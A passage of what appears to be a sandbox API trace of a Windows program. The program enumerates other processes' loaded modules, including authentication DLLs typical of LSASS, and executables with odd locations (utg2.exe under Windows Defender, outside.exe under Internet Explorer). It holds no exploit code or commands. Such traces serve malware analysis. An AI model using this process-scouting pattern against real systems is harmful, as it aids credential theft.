cb=0x18 | out: lpmodinfo=0x262ae70*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0053.355] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="cryptbase.dll") returned 0xd [0053.357] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0053.359] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd090000, lpmodinfo=0x262d040, cb=0x18 | out: lpmodinfo=0x262d040*(lpBaseOfDll=0x7fefd090000, SizeOfImage=0xb8000, EntryPoint=0x7fefd0b2de0)) returned 1 [0053.361] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd090000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="kerberos.DLL") returned 0xc [0053.364] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd090000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kerberos.DLL" (normalized: "c:\\windows\\system32\\kerberos.dll")) returned 0x20 [0053.366] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x262f210, cb=0x18 | out: lpmodinfo=0x262f210*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0053.367] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0053.369] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0053.379] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x26313d0, cb=0x18 | out: lpmodinfo=0x26313d0*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0053.381] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0053.383] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0053.385] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x26337a8, cb=0x18 | out: lpmodinfo=0x26337a8*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0053.387] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0053.389] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0053.391] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd010000, lpmodinfo=0x2635958, cb=0x18 | out: lpmodinfo=0x2635958*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0053.393] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd010000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0053.396] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd010000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0053.398] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd000000, lpmodinfo=0x2637b18, cb=0x18 | out: lpmodinfo=0x2637b18*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0053.400] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd000000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0053.403] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd000000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0053.405] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcfa0000, lpmodinfo=0x2639cd8, cb=0x18 | out: lpmodinfo=0x2639cd8*(lpBaseOfDll=0x7fefcfa0000, SizeOfImage=0x52000, EntryPoint=0x7fefcfa3e84)) returned 1 [0053.406] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcfa0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="msv1_0.DLL") returned 0xa [0053.408] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcfa0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msv1_0.DLL" (normalized: "c:\\windows\\system32\\msv1_0.dll")) returned 0x1e [0053.411] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcef0000, lpmodinfo=0x263be98, cb=0x18 | out: lpmodinfo=0x263be98*(lpBaseOfDll=0x7fefcef0000, SizeOfImage=0xae000, EntryPoint=0x7fefcf04100)) returned 1 [0053.413] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcef0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="netlogon.DLL") returned 0xc [0053.415] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcef0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netlogon.DLL" (normalized: "c:\\windows\\system32\\netlogon.dll")) returned 0x20 [0053.417] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefce90000, lpmodinfo=0x263e068, cb=0x18 | out: lpmodinfo=0x263e068*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0053.419] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefce90000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0053.421] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefce90000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0053.424] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefce60000, lpmodinfo=0x2640228, cb=0x18 | out: lpmodinfo=0x2640228*(lpBaseOfDll=0x7fefce60000, SizeOfImage=0x30000, EntryPoint=0x7fefce6194c)) returned 1 [0053.426] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefce60000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="logoncli.dll") returned 0xc [0053.428] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefce60000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")) returned 0x20 [0053.430] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefce00000, lpmodinfo=0x26423f8, cb=0x18 | out: lpmodinfo=0x26423f8*(lpBaseOfDll=0x7fefce00000, SizeOfImage=0x57000, EntryPoint=0x7fefce05e38)) returned 1 [0053.432] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefce00000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="schannel.DLL") returned 0xc [0053.435] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefce00000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\schannel.DLL" (normalized: "c:\\windows\\system32\\schannel.dll")) returned 0x20 [0053.437] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x26445c8, cb=0x18 | out: lpmodinfo=0x26445c8*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0053.439] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0053.441] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0053.443] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcdc0000, lpmodinfo=0x2646788, cb=0x18 | out: lpmodinfo=0x2646788*(lpBaseOfDll=0x7fefcdc0000, SizeOfImage=0x36000, EntryPoint=0x7fefcdc1ad0)) returned 1 [0053.446] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcdc0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wdigest.DLL") returned 0xb [0053.448] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcdc0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wdigest.DLL" (normalized: "c:\\windows\\system32\\wdigest.dll")) returned 0x1f [0053.450] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x2648948, cb=0x18 | out: lpmodinfo=0x2648948*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0053.453] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0053.455] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0053.457] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd50000, lpmodinfo=0x264ab08, cb=0x18 | out: lpmodinfo=0x264ab08*(lpBaseOfDll=0x7fefcd50000, SizeOfImage=0x19000, EntryPoint=0x7fefcd511fc)) returned 1 [0053.460] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd50000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="tspkg.DLL") returned 0x9 [0053.462] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd50000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\tspkg.DLL" (normalized: "c:\\windows\\system32\\tspkg.dll")) returned 0x1d [0053.465] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd00000, lpmodinfo=0x264ccc8, cb=0x18 | out: lpmodinfo=0x264ccc8*(lpBaseOfDll=0x7fefcd00000, SizeOfImage=0x45000, EntryPoint=0x7fefcd32ccc)) returned 1 [0053.468] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd00000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="pku2u.DLL") returned 0x9 [0053.470] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd00000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pku2u.DLL" (normalized: "c:\\windows\\system32\\pku2u.dll")) returned 0x1d [0053.472] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefccb0000, lpmodinfo=0x264eea0, cb=0x18 | out: lpmodinfo=0x264eea0*(lpBaseOfDll=0x7fefccb0000, SizeOfImage=0x4c000, EntryPoint=0x7fefccb7950)) returned 1 [0053.475] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefccb0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="bcryptprimitives.dll") returned 0x14 [0053.477] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefccb0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")) returned 0x28 [0053.480] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x2651090, cb=0x18 | out: lpmodinfo=0x2651090*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0053.482] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0053.485] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0053.489] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc90000, lpmodinfo=0x2653260, cb=0x18 | out: lpmodinfo=0x2653260*(lpBaseOfDll=0x7fefcc90000, SizeOfImage=0x12000, EntryPoint=0x7fefcc9b750)) returned 1 [0053.491] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc90000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="efslsaext.dll") returned 0xd [0053.494] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc90000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\efslsaext.dll" (normalized: "c:\\windows\\system32\\efslsaext.dll")) returned 0x21 [0053.496] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcbf0000, lpmodinfo=0x2655430, cb=0x18 | out: lpmodinfo=0x2655430*(lpBaseOfDll=0x7fefcbf0000, SizeOfImage=0x3e000, EntryPoint=0x7fefcbf1040)) returned 1 [0053.499] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcbf0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="scecli.DLL") returned 0xa [0053.502] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcbf0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\scecli.DLL" (normalized: "c:\\windows\\system32\\scecli.dll")) returned 0x1e [0053.504] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x26575f0, cb=0x18 | out: lpmodinfo=0x26575f0*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0053.507] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0053.510] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0053.513] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x26597b0, cb=0x18 | out: lpmodinfo=0x26597b0*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0053.516] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0053.519] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0053.522] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb270000, lpmodinfo=0x265b970, cb=0x18 | out: lpmodinfo=0x265b970*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0053.524] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb270000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0053.527] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb270000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0053.530] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb260000, lpmodinfo=0x265db40, cb=0x18 | out: lpmodinfo=0x265db40*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0053.533] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb260000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0053.536] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb260000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0053.539] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9c0000, lpmodinfo=0x265fd00, cb=0x18 | out: lpmodinfo=0x265fd00*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0053.541] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0053.545] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0053.548] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9a0000, lpmodinfo=0x2661ed0, cb=0x18 | out: lpmodinfo=0x2661ed0*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0053.551] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0053.554] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0053.557] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb20000, lpmodinfo=0x2664090, cb=0x18 | out: lpmodinfo=0x2664090*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0053.560] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb20000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0053.563] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb20000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0053.566] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x2666250, cb=0x18 | out: lpmodinfo=0x2666250*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0053.569] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0053.572] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0053.575] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac20000, lpmodinfo=0x2668410, cb=0x18 | out: lpmodinfo=0x2668410*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0053.578] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac20000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0053.582] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac20000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0053.585] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac00000, lpmodinfo=0x266a5e0, cb=0x18 | out: lpmodinfo=0x266a5e0*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0053.588] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac00000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0053.592] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac00000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0053.595] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca10000, lpmodinfo=0x266c7b0, cb=0x18 | out: lpmodinfo=0x266c7b0*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0053.598] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca10000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0053.601] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca10000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0053.605] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef2890000, lpmodinfo=0x266e980, cb=0x18 | out: lpmodinfo=0x266e980*(lpBaseOfDll=0x7fef2890000, SizeOfImage=0x32000, EntryPoint=0x7fef2891060)) returned 1 [0053.608] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef2890000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="dssenh.dll") returned 0xa [0053.611] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef2890000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll")) returned 0x1e [0053.614] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb00000, lpmodinfo=0x2670b40, cb=0x18 | out: lpmodinfo=0x2670b40*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0053.617] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb00000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0053.621] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb00000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0053.624] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e4) returned 0x218 [0053.624] EnumProcessModules (in: hProcess=0x218, lphModule=0x26745f0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x26745f0, lpcbNeeded=0x41eb20) returned 1 [0053.625] GetModuleInformation (in: hProcess=0x218, hModule=0x2a0000, lpmodinfo=0x2674860, cb=0x18 | out: lpmodinfo=0x2674860*(lpBaseOfDll=0x2a0000, SizeOfImage=0x17000, EntryPoint=0x2a14a1)) returned 1 [0053.625] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x2a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="utg2.exe") returned 0x8 [0053.625] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x2a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Defender\\utg2.exe" (normalized: "c:\\program files (x86)\\windows defender\\utg2.exe")) returned 0x30 [0053.625] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2676a80, cb=0x18 | out: lpmodinfo=0x2676a80*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.626] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.626] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.626] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2678c40, cb=0x18 | out: lpmodinfo=0x2678c40*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0053.627] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0053.627] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0053.627] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x267ae18, cb=0x18 | out: lpmodinfo=0x267ae18*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0053.628] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0053.628] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0053.628] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x267cfe8, cb=0x18 | out: lpmodinfo=0x267cfe8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0053.629] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0053.629] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0053.630] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x988) returned 0x218 [0053.630] EnumProcessModules (in: hProcess=0x218, lphModule=0x267f6f8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x267f6f8, lpcbNeeded=0x41eb20) returned 1 [0053.630] GetModuleInformation (in: hProcess=0x218, hModule=0x1200000, lpmodinfo=0x267f968, cb=0x18 | out: lpmodinfo=0x267f968*(lpBaseOfDll=0x1200000, SizeOfImage=0x17000, EntryPoint=0x12014a1)) returned 1 [0053.631] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x1200000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="outside.exe") returned 0xb [0053.631] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x1200000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\outside.exe" (normalized: "c:\\program files (x86)\\internet explorer\\outside.exe")) returned 0x34 [0053.631] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2681b90, cb=0x18 | out: lpmodinfo=0x2681b90*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.631] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.632] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.632] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2683d50, cb=0x18 | out: lpmodinfo=0x2683d50*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0053.632] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0053.633] GetModuleFileNameExW (in: hProcess=0x218, 